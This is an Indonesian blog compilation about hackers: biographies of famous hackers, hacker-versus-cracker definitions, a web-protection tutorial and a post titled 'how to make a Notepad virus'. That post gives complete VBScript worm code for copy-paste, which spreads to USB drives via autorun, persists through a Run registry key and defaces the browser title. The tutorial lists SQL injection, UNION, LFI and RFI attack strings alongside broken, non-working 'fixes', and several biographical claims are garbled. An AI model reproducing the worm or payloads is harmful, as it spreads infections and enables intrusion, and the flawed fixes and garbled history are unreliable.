Joanna Rutkowska adalah seorang wanita polandia yang tertarik dengan dunia hacking security. Namanya pertama kali dikenal setelah konferensi Black Hat Briefings di Las Vegas, agustus 2006. Dimana saat itu Rutkowska mempresentasikan proses serangan yang telah dia lakukan terhadap sistem keamanan windows vista.

Tidak hanya itu, Rutkowska juga pernah menyerang Trusted Execution Technology dan System Management Mode milik Intel. Awal 2007 dia membentuk Invisible Things Lab di Warsawa, Polandia. Sebuah perusahaan yang berfokus terhadap research keamanan OS juga VMM serta layanan konsultasi keamanan internet.

Tahun 2010 juga Rutkowska bersama Rafal Wojtczuk membentuk Qubes, sebuah Operating System yang sangat full protect security.
Sahabat anehdidunia.blogspot, Rutkowska juga pernah memberikan saran terbuka untuk Vice President of Microsoft Security Technology Unit untuk lebih memperketat sistem keamanan dalam windows vista. Waw, Rutkowska memang seorang hacker yang sangat welcome untuk diajak bekerjasama.

5.Raven Adler



Di urutan terakhir, kita punya Raven Adler. Seorang wanita berpenampilan gothic yang tertarik dengan dunia internet, khususnya dunia hacking. Raven adalah wanita pertama yang pernah hadir dalam konferensi hacker DefCon. Perhatian konferens tentu saja tertuju penuh untuknya. Tapi dia mengaku tidak ingin memanfaatkan gender nya sebagai wanita untuk mendongkrak kredibilitasnya sebagai hacker.

Dalam banyak kesempatan pula, dia tidak begitu senang dipanggil dengan sebutan ‘Hacker wanita’. Dia lebih senang dipandang karena skill nya, bukan karena posisinya yang spesial sebagai seorang wanita. Saat ini dia aktif mendesign, menguji dan mengaudit sistem detektor keamanan untuk berbagai agen-agen federal besar. Selain itu, di sela-sela kesibukanya dia juga telaten mempelajari ilmu beladiri Ryu Shorin Matsumura.

Cara Melindungi Web Dari Peretas/Hacker

Cara Melindungi Web Dari Peretas/Hacker

Temen " nih gw baru belajar tentang cara melindungi web dari serangan hacker. gw belajar dari situs web asing. terus sedikit gw unek uneuk dan hasilnya jejreng...
di sini gw akan ngasih kalian tutornya.

tutornya susah Gak bisa di pelajari oleh hacker newbie. harus mengetahui bahasa komputer. aaaa------------ & terakhir semua yg di atas tuh boong, hahaha :).
kalian cuma tinggal copy-paste & klick sana-sini.
nih tutornya gw kasih.

[1] Pendahuluan

Artikel ini akan berisi tentang empat jenis serangan web umum dan pencegahannya, yang digunakan
di sebagian besar jenis defacement. Lima eksploitasi umum yang saya cantumkan di bawah ini
adalah XSS, SQL injection, RFI dan LFI. Sebagian besar kesalahan terjadi pada pemrograman
yang memungkinkan attacker untuk dapat menyusup ke dalam website.

[2] Cross Site Scripting

Cross Site Scripting adalah jenis celah yang digunakan oleh attacker untuk menyuntikkan kode ke halaman
web yang rentan terhadap serangan ini. Jika sebuah situs rentan terhadap cross site scripting, attacker
kemungkinan besar akan mencoba untuk menyuntikkan situs dengan javascript berbahaya atau mencoba scam pengguna
dengan menciptakan bentuk halaman web yang hampir sama untuk mendapatkan informasi.

Example:
http://www.situs.net/find.php?all=”>

*Solusi (javascript) :

function RemoveBad(strTemp) {
strTemp = strTemp.replace(/\|\"|\'|\%|\;|\(|\)|\&|\+|\-/g,"");
return strTemp;
}

[3] SQL Injection

*\_ Login Form Bypassing

Berikut adalah contoh kode yang dapat kita bisa bypass:

index.html file:

Password:

login.php file:

Kita dapat bypass dengan menggunakan ‘ or ’1=1′, dan menjalankan “password = ”or ’1=1”;”.
Atau attacker dapat juga dapat menghapus database dengan menjalankan “‘ drop table database; –”.

*Solusi :

Menggunakan mysql_real_escape_string
Contoh:

*\_ Union SQL Injection

Union SQL injection adalah ketika pengguna menggunakan perintah UNION. Memeriksa celah dengan menambahkannya
di akhir url “sebuah php?.id=”. Jika terdapat error MySQL, situs tersebut kemungkinan besar
besar rentan terhadap UNION SQL Injection. Attacker melanjutkan menggunakan ORDER BY untuk menemukan kolom,
dan pada akhirnya, mereka menggunakan perintah UNION ALL SELECT.

Contoh :

http://www.situs.net/index.php?id=1′

salah satu contoh pesan error:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in…..

Setelah muncul pesan error,maka attacker melanjutkan aksinya ;) )
http://www.situs.net/index.php?id=1 ORDER BY 1– <– No error.
http://www.situs.net/index.php?id=1 ORDER BY 2– <– Muncul pesan error. Ini berarti hanya ada satu kolom
http://www.situs.net/index.php?id=-1 UNION SELECT ALL version()– <– Memilih semua kolom dan menjalankan
perintah version().

*Solusi :

Tambahkan sesuatu seperti di bawah ini untuk mencegah SQL injection Union:

$bug = "(delete)|(update)|(union)|(insert)|(drop)|(http)|(--)|(/*)|(select)";
$patch = eregi_replace($bug, "", $patch);

[4] File Inclusion

\_ Remote File Inclusion dan Local File Inclusion

Remote File Inclusion adalah sebuah celah dimana situs mengizinkan attacker meng-includ file dari luar server.
Local File Inclusion adalah sebuah celah dalam situs dimana attacker dapat mengakses semua file di dalam server
dengan hanya melalui URL.

Contoh kode yang vulnerable :

Beberapa contoh serangan :
http://www.situs.net/page.php?page=../../../../../ etc/passwd < contoh LFI
http://www.situs.net/page.php?page=http://www.site.com/evilscript.txt? < contoh RFI

*Solusi :

Validate the input.
$page = $_GET['page'];
$allowed = array('index.php', 'games.php' 'ip.php');
$iplogger = ('ip.php');
if (in_array $page, $pages)) {
include $page {
else
{
include $iplogger
die("IP logged.");
}

Sejarah Hacker paling hebat Dunia

 Sejara Hacker paling hebat di dunia

     Seperti yang dilansir di wikipedia, sejarah Hacker Terminologi peretas muncul pada awal tahun 1960-an di antara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka berkutat dengan sejumlah komputer mainframe. Kata bahasa Inggris "hacker" pertama kalinya muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik daripada yang telah dirancang bersama.


Kemudian pada tahun 1983, istilah hacker mulai berkonotasi negatif. Pasalnya, pada tahun tersebut untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414s yang berbasis di Milwaukee, Amerika Serikat. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Satu dari pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan.

Kemudian pada perkembangan selanjutnya muncul kelompok lain yang menyebut-nyebut diri sebagai peretas, padahal bukan. Mereka ini (terutama para pria dewasa) yang mendapat kepuasan lewat membobol komputer dan mengakali telepon (phreaking). Sahabat anehdidunia.com peretas sejati menyebut orang-orang ini cracker dan tidak suka bergaul dengan mereka. Peretas sejati memandang cracker sebagai orang malas, tidak bertanggung jawab, dan tidak terlalu cerdas. Peretas sejati tidak setuju jika dikatakan bahwa dengan menerobos keamanan seseorang telah menjadi peretas.

Para peretas mengadakan pertemuan tahunan, yaitu setiap pertengahan bulan Juli di Las Vegas. Ajang pertemuan peretas terbesar di dunia tersebut dinamakan Def Con. Acara Def Con tersebut lebih kepada ajang pertukaran informasi dan teknologi yang berkaitan dengan aktivitas peretasan.

Peretas memiliki konotasi negatif karena kesalahpahaman masyarakat akan perbedaan istilah tentang hacker dan cracker. Banyak orang memahami bahwa peretaslah yang mengakibatkan kerugian pihak tertentu seperti mengubah tampilan suatu situs web (defacing), menyisipkan kode-kode virus, dan lain-lain, padahal mereka adalah cracker. Cracker-lah menggunakan celah-celah keamanan yang belum diperbaiki oleh pembuat perangkat lunak (bug) untuk menyusup dan merusak suatu sistem. Atas alasan ini biasanya para peretas dipahami dibagi menjadi dua golongan: White Hat Hackers, yakni hacker yang sebenarnya dan cracker yang sering disebut dengan istilah Black Hat Hackers.

Membaca sejarah hacker diatas, membuat kita ingin mengetahui siapakah hacker paling terkenal atau hacker paling top di dunia ini. Berikut sahabat anehdidunia.com kami tampilkan hacker ternama di dunia.
 
Kevin Mitnick
 
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiijMLAYaS6HcJoJPJl-dNJIGuGuZN2glOCUvsYh_ll7ukhRsmULxA99gIstOSih13EBnP3hGbMwgHh8eHWuhFQ6LmrDWaVqO5Ljs1J_AqCk7DsQGNpGCxJxzecJec_cogCIyDFDH-t4iI/s400/Kevin_Mitnick.jpg
Mungkin Mitnick menjadi Hacker paling terkenal dari generasinya, karena Mitnick telah ‘dinobatkan‘ oleh Departemen Kehakiman US menjadi criminal computer paling diinginkan di sepanjang seharag United States. Mitnick dengan postur tubuhnya yang cocok dengan karakter hacker, masuk ke sejumlah system komputer milik perusahaan teknologi dan telekomunikasitop dunia, termasuk Nokia, Fujitsu, dan Motorola. Setelah dipublikasikan besar-besaran oleh FBI, Mitnick akhirnya ditahan di tahun 1995 dan setelah menerima berbagai tuduhan, ia akhirnya menghabiskan waktu di penjara selama 5 tahun. Ia dibebaskan tahun 2000 dan kini membuka konsultan keamanan komputer. Ia tidak menamakan aksinya sebagai ‘hacking‘ dan malah memberi nama ’social engineering’.

Kevin Poulson
 
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilGuDU0LKV-Azg00m48pLDdUXwaP1LeHY9zBtn9vwdpejQhC9uhjDn8z-sZDkCtV9Ws4WFJCrd3jvvTKZ5nZ28TKgF89AF6UIxCyh-pUud9gQL46TYkTks9EmXRekUKRqpo79zTJC7cf5r/s1600/los-10-hackers-mas-famosos1.jpg
Poulson pertama kali masuk ke dunia hacking melalui line telepon di stasiun radio KIIS-FM di kota Los Angeles, dan yang membuat Poulson terkenal ketika melakukan penipuan digital dengan mengaku menjadi penelepon yang menjebol line telepon ke-102 hanya untuk mendapatkan uang untuk membeli Porsche. Kevin Poulson atau nama aliasnya Dark Dante,berhasil mengaktifkan kembali Yellow Page, kemudian menggunakan nomor telepon di dalamnya untuk menjalankan agen pengawal secara virtual. Pihak kepolisian kemudian menangkap Poulson dan memenjarakannya selama 3 tahun setelah ia meng-hack database investigasi federal, dan juga semua 1,800 line telepon yang dibuatnya mengalami crash. Setelah ia keluar dari penjara ia kini menjadi journalis.

Adrian Lamo
 
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAV3KobArdhcQiSkSOv6fD1Ku0gaTCyEfCaHDx5qEyQs5ZLbf-Ul_WBRNMYw9xM1jFkbxUeoAXNaVs0PHBsCJ-juarGiF74_4aoIpahMz-r0khjsg8dmjbhYZOfVKZ69W1a6doskJgn9Y/s1600/adrian-lamo-3.jpg
Adrian Lamo atau yang dijuluki ‘hacker tak punya rumah’, biasanya menggunakan coffee shop, perpustakaan, dan café Internet sebagai basisnya untuk menjalankan aksinya. Kebanyakan aktivitasnya adalah membobol jaringan komputer dan kemudian melaporkan kelemahannya kepada perusahaan yang memiliki jaringan tersebut. Klaim terbesar Lamo yang menjadikannya terkenal adalah setelah ia menjebol intranet kantor New York Times dan menambahkan namanya di database perusahan surat kabar harian tersebut. Ia juga menggunakan account LexisNexis untuk mendapatkan akses rahasia ke profilpejabat perusahaan tersebut. Kini Lamo bekerja sebagai journalis.

Stephen Wozniak
 
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj17za8-BoKRSuqN1D5loMJ8GWurjCIi2XRDUF8l_HXI5keoxATcyROHrk2DUYWw1tyv3j1WGK1zSxVlgEyo21rWCJx8q82jvmnHM4Ag9JZOcCQmwjKskujmgY8BuDY0r74cuiI7-04rc5O/s320/steve-wozniak-dancing-with-the-stars.jpg
Terkenal sebagai co-founder Apple, memulai aksi ‘white-hat’-nya dengan menjebol system telepon. Ketika bersekolah di University of California ia membuat device untuk temannya bernama ‘blue box’ dan memperbolehkan teman-temannya untuk menelepon dalam waktu selama mungkin, gratis. Namun, kemudian Wozniak keluar dari universitas tersebut dan bekerja dengan temannya Steve Jobs, membuat Apple Computer.

Loyd Blankenship
http://shareberita.files.wordpress.com/2009/11/loyd01.jpg
Terkenal dengan nama ‘Mentor’, merupakan member dari group elite hacker di tahun 1980. Aksinya yang terbesar adalah ia menjadi pengarang dari Hacker Manifesto (The Conscience of a Hacker), yang ia tulis di penjara di tahun 1986. Dalam buku Hacker Manifesto (The Conscience of a Hacker), tersebut disebutkan bahwa hacker hanyalah tindakan yang dibuat oleh hacker hanyalah sekedar keingintahuan dan tidak hanya dijadikan moral hacker sekarang ini, namun juga menjadi paradigma absolute dari filosofi hacker. Buku tersebut diulas pula dalam majalah Phrack, dan bahkan dibuat film di tahun 1995 dengan judul hacker, dengan bintang Angelina Jolie.

Linus Torvalds
 
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQaqku8t7uE_6AQTd74lX65aZSQHe8AzJYjBwcwh7V869ztU-8cwnOpus8hkY8TMgCGA5BFvWcwmCSBazs8lnRUIfa_4J3gNYPjFXalcDsQsKAN75oI2Rk0WteZ6vQlhl-_L9h-phimJk/s1600/Linus-Torvalds.jpg
Hacker yang juga mengembangkan sistem operasi Linux, gabungan dari “LINUS MINIX”. Kini sistem operasi Linux telah menjadi sistem operasi ‘default’ hacker. Kemudian bersama dengan Richard Stallman membangun Linux versi awal, bekerja sama dengan programmer, developer dan hacker seluruh dunia untuk mengembangkan kernel Linux.

John Draper
 
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGLi_k5Ip2X9fyyGWCv2nbB79LYWvxQci0PDUEDR_jA1EUSMmwXL-0KuC6K4jMcXLcckfJ3X054X9bAUOTa5A9uS7boxEGk3VUcXKsUCmNrw3XpTye1uhLn4qVX7hrpNBAIqM8KNfMWCuT/s1600/Jhon+Draper.jpeg
Hacker satu ini menggunakan bantuan peluit plastik yang merupakan hadiah dari kotak sereal “Cap n Crunch”, ia berhasil menjebol system telepon. Ia menemukan frekuensi 2600 Hz dan dan digunakan sebagai alat untuk melakukan pemanggilan telepon gratis. Pada perkembangannya, frekuensi 2600 Hz tidak lagi dibuat dengan peluit plastik, tapi menggunakan alat yang disebut “Blue Box”.

Mark Abene
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhcyUhURAwe-XajcVxvXW5RNC4Dy-xVAJfzI6lrrhYGNOq-Oj3BXuOt7r_fg5CfAbhZaNz5b29LH2M2Klk_whBr90joAjeazB2y3XCt6clR0PVhrfpT_0n0Bob7HATaO08y9mHO2nh9Us/s1600/Mark+Abene+copy.png
Masuk menjadi salah satu member “Master of Deception” dan Hacker Groups Legion of Doom atau yang dikenal sebagai Phiber Optik yang berbasis di group elite di New York, yang menargetkan system telepon US, termasuk system compuetr AT&T di akhir pertengahan tahun 80-an.Group tersebut akhirnya bubar di tahun 1992 ketika banyak membernya masuk penjara. Di tahun 1994, ia dihukum penjara satu tahun atas konspirasi dan akses tidak sah ke komputer dan system telepon.

Richard Stallman
Merupakan penemu project GNU, dan menjadi salah satu ‘hacker sekolah senior‘ bekerja pada lab Artificial Intelligence MIT. Ia bekerja sebagai ‘staff hacker‘ di project Emac itu dan memprotes adanya pembatasan atas akses komputer di lab tersebut. Setelah password diisntal, maka ia kemudian membobol system pasword dan mengirimkan pesan kepada setiap staff untuk menghapus password.

Ian Murphy
Ian Muphy berhasil melakukan hacking ke dalam komputer AT&T dan menggubah seting jam internal-nya.Hal ini mengakibatkan banyak pengguna telepon mendapatkan diskon ‘tengah malam‘ pada sore hari, dan yang telah menunggu hingga tengah malam harus membayar dengan tagihan yang tinggi.

Vladimir Levin
Hacker satu ini berhasil melakukan penipuan ke komputer CitiBank dan mendapatkan keuntungan 10 juta dollar. Ia merupakan lulusan St. Petersburg Technology University, dan kemudian ditangkap Interpol di Heathrow Airport pada tahun 1995.

Tsutomu Shimomura
Merupakan ahli keamanan komputer yang top, dan berhasil menangkap jejak Kevin Mitnick di tanggal 15 Februari 1995 ketika Mitnick membobol komputernya.

Eric Steven Raymond
Dijuluki sebagai Bapak hacker. Seorang hacktivist dan pelopor opensource movement. Ia menulis banyak panduan hacking, salah satunya adalah: “How To Become A Hacker” dan “The new hacker’s Dictionary”.

Onel A. de Guzman
 
Seorang mahasiswa asal Filipina yang menjadi Greatest Hacker. Ia menciptakan virus ‘Love Bug’ untuk membobol system layanan email seluruh dunia.

Mudge
 
Mudge bersama pengikutnya berhasil mematikan trafik Internet di perusahaannya selama satu setengah jam.

Chen Ing-Hau
 
Ia merupakan pembuat virus komputer mematikan ‘Chernobyl’ yang mematikan banyak system di dunia.

Dennis Moran
 
Terkenal dengan nama ‘Coolio’, dihukum bersalah atas dakwaan hacking situs nasional, seperti kesatuan militer, Air Force dan anti drug Dare.com.

David L. Smith
 
Smith merupakan pengarang dari virus worm Melissa yang sukses menjadi virus email pertama yang didistribusikan di group diskusi Usenet alt.sex. Bentuk virus aslinya dikirimkan juga via email. Smith akhirnya ditahan dan dihukum penjara atas tuduhan kerugian sebesar $80 juta.

Sven Jaschan
 
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfpVpHlN6o6qoXoFTDPj4gUMBwrjEHvy8mcc0pe2U-Jw7zTF21lInnztKmdSAUG66zQFkVZJvzRnaaY3RUblfvv2izwLoo7GHxW4XohnFfFj9oJeHzhSI58D6MbPZSYoIPSK97p4G9tRs/s748/canvas.png
Jaschan didakwa bersalah atas pembuatan worm Netsky and Sasser di tahun 2004 ketika ia masih remaja. Virus tersebut yang bertanggung jawab atas 70 persen penyebaran malware melalui Internet pada waktu itu. Jaschan menerima hukuman selama 3 tahun untuk kejahatannya, dan setelah bebas ia pun direkrut oleh sebuah perusahaan keamanan.

Michael Calce
 
Calce baru berusia 15 tahun ketika ia berhasil membobol website komersial terbesar di dunia. Hacker yang juga memiliki nama MafiaBoy tersebut di tahun 2000 meluncurkan serangan DDoS ke 75 komputer di 52 jaringan, juga situs eBay, Amazon dan Yahoo. Ia akhirnya ditahan setelah ia membeberkan aksinya di chatroon online. Ia dihukum penjara selama 8 bulan dan denda yang kecil.

Robert Tappan Morris
 
November 1988, sebuah virus computer berhasil ditemukan oleh Cornell University, menginfeksi sekitar 6,000 mesin Unix, dan menimbulkan kerugian jutaan dollar. Pembuat virus tersebut diketahui bernama Robert Tappan Morris. Morris mengatakan bahwa virus 'worm'-nya tidak ditujukan untuk merusak apapun, namun bagaimanapun ia harus menjalani hukuman penjara 3 tahun. Sementara disc yang mengandung source code worm Morris kini disimpan di Boston Museum of Science.

Cara buat Virus notepad

 Virus notepad

Nih virus sedikit berbahaya Via Notepad.
Saya srankan di coba bukan di komputer sendiri..
nih tinggal copy paste aja di notepad.

Code:

on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\MS32DLL.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Andre Susanto"
rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname


Save dengan eksistensi .vbs
Contoh : Virus.vbs

Semoga sukses.. :)

TUJUH KELOMPOK HACKER BERDASARKAN PROFILE KEMAMPUAN

   7 Kelompok HACKER berdasarkan profile kemampuan

Pembagian para hacker berdasarkan profile kemampuan profesionalnya terbagi menjadi tujuh kelompok. Hal ini sebagaimana dijelaskan oleh Marc Rogers MA, seorang guru besar psikologi dari University of Manitoba Hawai, yakni:

   Tool Kids/NewBies Orang-orang yang baru belajar aktivitas hacking, namun kemampuan kemampuan tentang komputer serta teknik pemrograman relatif terbatas dan hanya baru bisa membuat program-program dasar. Aktivitas hacking yang dilakukan, umumnya menggunakan bantuan aplikasi yang terdapat di internet hingga tidak murni mengandalkan kemampuan individunya.

   Cyber Punk Orang-orang yang memiliki pengetahuan dan teknik komputer yang lebih tinggi dibandingkan NewBies. Mereka sudah mampu memahami karakteristik dari sistem jaringan ataupun sistem yang sedang mereka serang. Pengetahuan mereka tentang bahasa pemrograman cukup andal, karena mampu mendefinisikan hingga karakteristik umumnya. Dengan kemampuannya ini, ia sudah mampu menciptakan alat bantu infiltrasi sendiri, hingga tidak lagi menggunakan program-program bantu yang tersedia di internet. Aktivitas-aktivitas yang dilakukan memiliki kecenderungan untuk kriminal, seperti defacing web, carding, ataupun spamming.

   Internals Orang-orang yang masih bergabung ataupun pernah (mantan) dengan perusahaan TI, dengan kemampuan komputer dan programming yang anda. Dan melakukan berbagai aktivitas hacking dengan mengandalkan berbagai kombinasi sumber daya internal maupun eksternal yang ada untuk berbagai tujuan. Contoh, pelanggaran paling sering dilakukan adalah breaking over priviledge activity, yakni segala aktivitas yang melanggar batasan-batasan hak yang dimiliki.

   Coders Golongan ini dikenal juga sebagai resources, yakni orang-orang yang menjual berbagai informasi yang ada di internet ke pihak-pihak yang membutuhkan. Kemampuan programming dan teknisnya sangat andal dan kelompok ini malakukan berbagai aktivitas infiltrasi dalam rangka untuk memperoleh berbagai data ataupun informasi yang dapat dijual. Coders juga membantu membuat berbagai aplikasi bantu hacking yang dibutuhkan oleh para hacker ataupun attacker/cracker yang membutuhkan.

  Old Guard Hackers (Idealism Gate Keepers) Para hacker sejati yang murni melakukan aktivitas-kativitas hacking dalam rangka untuk tujuan ilmiah dan kebaikan semua pihak. Jumlah golongan ini relatif sangat sedikit, karena idealisme yang dijunjung memaksa mereka untuk menggunakan kode etik yang dijunjung tinggi oleh para hacker, yakni kemampuan di atas segalanya.
 
   Professional Criminals Para attacker/cracker yang bergerak atas nama kelompok ataupun individu dan melakukan berbagai aktivitas cyber crime sebagai sumber kehidupan utamanya. Kemampuan yang dimiliki oleh kelompok ini sangat sempurna karena mengombinasikan berbagai piranti keras dan pengetahuan programming yang bisa diandalkan dibantu data/informasi yang diperoleh dari Coders. Aktivitas kejahatan yang dilakukan tidak lagi dalam kelas cyber punk yang lebih banyak pada target individu, namun justru pada kalangan korporat dengan jalan merampok dana yang tersedia dengan melakukan transfer secara tersembunyi.

  Cyber Terrorist Sekelompok orang atau individu yang bertindak atas dasar sentimen pada suatu kelompok atau pihak tertentu, dan melakukan berbagai aktivitas yang bertujuan untuk menunjukkan eksistensi mereka pada lingkungan dunia. Tingkatan kemampuan yang dimiliki kelompok ini adalah yang tertinggi karena menggabungkan berbagai sumber daya yang ada, level kemampuan, bahkan menggunakan sarana prasarana bantuan dari pihak sponsor yang membantu seperti satelit komunikasi.

Jumat, 30 Agustus 2013

Hacker Indonesia Ternama di Dunia yang Meretas Satelit


jim geovedi di indonesiaproud wordpress com

Sejak merebaknya kasus Wildan, sang pengganti tampilan situs resmi Presidensby.info, pamor peretas (hacker) Indonesia kembali dibicarakan.
Memang, banyak pihak yang mengatakan bahwa ilmu Wildan masih belum bisa dikatakan pro, namun tidak sedikit pula yang mengatakan bahwa dia sudah tergolong pakar.
Terlepas dari pro atau tidaknya Wildan sebagai seorang hacker, beberapa tahun lalu ada seorang peretas dari Indonesia yang berhasil membuat banyak pihak tercengang.
Dia bukan meretas bank atau toko online atau sekadar situs milik presiden saja. Yang dia lakukan adalah langsung meretas satelit.
Hacker satu ini bernama Jim Geovedi (Jim.Geovedi.com). Keahlian dia dalam dunia peretasan menjadi pembicaraan banyak pihak, bahkan dia juga pernah menjadi pembicara dalam pertemuan hacker internasional.

Pria kelahiran 28 Juni 1979 ini adalah orang yang berbahaya. Pada masa ketika nyaris semua informasi dan manusia terkoneksi, Jim, jika dia mau, bisa setiap saat keluar masuk ke sana: melongok percakapan surat elektronik atau sekedar mengintip perselingkuhan anda di dunia maya.
Lebih dari itu, dia bisa saja mencuri data-data penting: lalu lintas transaksi bank, laporan keuangan perusahaan atau bahkan mengamati sistem pertahanan negara.
“Kalau mau saya bisa mengontrol internet di seluruh Indonesia,“ kata Jim dalam percakapan dengan Deutsche Welle.
Dia adalah hacker Indonesia dengan reputasi global: hilir mudik Berlin, Amsterdam, Paris, Torino, hingga Krakow menjadi pembicara pertemuan hacker internasional yang sering dibalut dengan nama seminar sistem keamanan.
Dalam sebuah pertemuan hacker dunia, Jim memperagakan cara meretas satelit. Jim bisa mengubah arah gerak atau bahkan menggeser posisi satelit. Keahliannya ini bisa anda lihat di Youtube.
Memang aksi peretasan satelit ini bukan dilakukan atas dasar iseng atau sejenisnya. Jim melakukan hal tersebut karena pada tahun 2006 (BBC News – 2006) dia pernah menjadi pembicara atas isu keamanan satelit.
Dari hal tersebut, Jim mencoba mempelajari sistem dan proses kerja satelit yang akhirnya dia dapat melakukannya. Tidak hanya dapat mengubah arahnya saja, Jim juga mampu menggeser satelit yang dia ‘lumpuhkan’ tersebut.
Setelah aksinya meretas satelit tersebut, pada bulan Januari 2009 silam (The Register – 2009), hasil penelitian atas kelemahan sistem satelit yang dia dapatkan dijadikan acuan salah satu topik pembicaraan dalam Black Hat Security Conference di Washington, D.C.
Archive.Cert.Uni-Stuttgart.de pernah mengulas bahwa Jim mendapatkan kemampuan hackernya ini tidak karena sekolah tinggi atau mempunyai gelar IT. Dia mempelajari sistem internet dan komputer secara otodidak dan pergaulannya yang luas dengan hacker-hacker dunia.
Uniknya, Jim tidak mau disebut sebagai pakar IT atau ahli. Dia lebih suka dianggap sebagai pengamat atau partisipan aktif saja.
Jim Geovedi pindah ke London tahun 2012 dan mendirikan perusahaan jasa sistem keamanan teknologi informasi bersama rekannya. Dia menangani para klien yang membutuhkan jasa pengamanan sistem satelit, perbankan dan telekomunikasi. Dua tahun terakhir, dia mengaku tertarik mengembangkan artificial intelligence komputer.
Tentunya, apabila pemerintah mau sedikit jeli, banyak ahli komputer dan IT di Indonesia ini yang mempunyai keahlian di atas rata-rata. Apabila mereka diberdayakan, maka teknologi IT di negara ini tidak akan kalah dengan negara lain.
Sumber: merdeka.com

PERBEDAAN ANTARA HACKER DAN CRACKER.


       Mendengar kata hacker, pasti banyak dari kita yang merasa benci, kenapa??
Pasti Anda tahu sendiri...
    Banyak dari Kita yang salah pengertian tentang Hacker, seringkali masyarakat awam menganggap bahwa istilah hacker dan cracker adalah SAMA.
Konotasinya hampir selalu negatif dan jahat. Padahal, ada diantara hackers yang berjasa besar karena menyelamatkan atau memperingatkan suatu sistem di Internet, sehingga sipemilik menyadari kelemahannya.

~Berikut ini adalah
pengertian hacker dan cracker:


>>Hacker adalah sebutan untuk orang atau sekelompok orang yang memberikan sumbangan bermanfaat untuk dunia jaringan dan sistem operasi, membuat program bantuan untuk dunia jaringan dan komputer. Hacker juga bisa di kategorikan perkerjaan yang dilakukan untuk mencari kelemahan suatu system dan memberikan ide atau pendapat yang bisa memperbaiki kelemahan system yang di temukannya.
>>cracker adalah sebutan untuk orang yang mencari kelemahan system dan memasukinya untuk kepentingan pribadi dan mencari keuntungan dari system yang dimasuki seperti: pencurian data, penghapusan, dan banyak yang lainnya.
 


>>Hacker :
1. Mempunyai kemampuan menganalisa kelemahan suatu sistem atau situs. Sebagai contoh : jika seorang hacker mencoba menguji suatu situs dipastikan isi situs tersebut tak akan berantakan dan mengganggu yang lain. Biasanya hacker melaporkan kejadian ini untuk diperbaiki menjadi sempurna. Bahkan seorang hacker akan memberikan masukan dan saran yang bisa memperbaiki kebobolan system yang ia masuki.

2. Hacker mempunyai etika serta kreatif dalam merancang suatu program yang berguna bagi siapa saja.

3. Seorang Hacker tidak pelit membagi ilmunya kepada orang-orang yang serius atas nama ilmu pengetahuan dan kebaikan.

4. Seorang hacker akan selalu memperdalam ilmunya dan memperbanyak pemahaman tentang sistem operasi.

>>Cracker :
1. Mampu membuat suatu program bagi kepentingan dirinya sendiri dan bersifat destruktif atau merusak dan menjadikannya suatu keuntungan. Sebagai
contoh : Virus, Pencurian Kartu Kredit, Kode Warez, Pembobolan Rekening Bank, Pencurian Password E-mail/Web Server.

2. Bisa berdiri sendiri atau berkelompok dalam bertindak.

3. Mempunyai website atau channel dalam IRC yang tersembunyi, hanya orang-orang tertentu yang bisa mengaksesnya.

4. Mempunyai IP address yang tidak bisa dilacak.

5. Kasus yang paling sering ialah Carding yaitu Pencurian Kartu
